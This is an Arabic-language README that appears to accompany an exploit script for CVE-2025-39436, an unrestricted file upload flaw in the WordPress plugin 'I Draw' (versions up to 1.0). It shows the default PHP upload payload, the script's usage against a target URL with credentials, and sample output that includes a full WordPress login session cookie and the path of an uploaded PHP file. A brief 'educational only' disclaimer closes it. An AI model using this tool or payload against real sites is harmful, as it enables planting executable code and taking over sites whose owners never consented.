
المكوّن الإضافي I Draw لووردبريس <= 1.0 عرضة لثغرة رفع ملفات اعتباطي
توجد ثغرة رفع ملف غير مقيد بنوع خطير في إضافة ووردبريس "I Draw". يسمح هذا الاستغلال للمهاجمين برفع ملفات خبيثة دون أي قيود. تؤثر المشكلة على إصدارات I Draw حتى 1.0.
يستغل هذا الاستغلال وظيفة رفع الملفات في الإضافة لتنفيذ حمولة PHP. فيما يلي الحمولة الافتراضية المستخدمة:
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help Show this help message and exit
-u, --url URL Target website URL
-un, --username USERNAME
Username
-p, --password PASSWORD
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
هذا السكربت مُقدَّم لأغراض تعليمية فقط. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. استخدمه على مسؤوليتك الخاصة.
بواسطة: Nxploited ( Khaled Alenazi )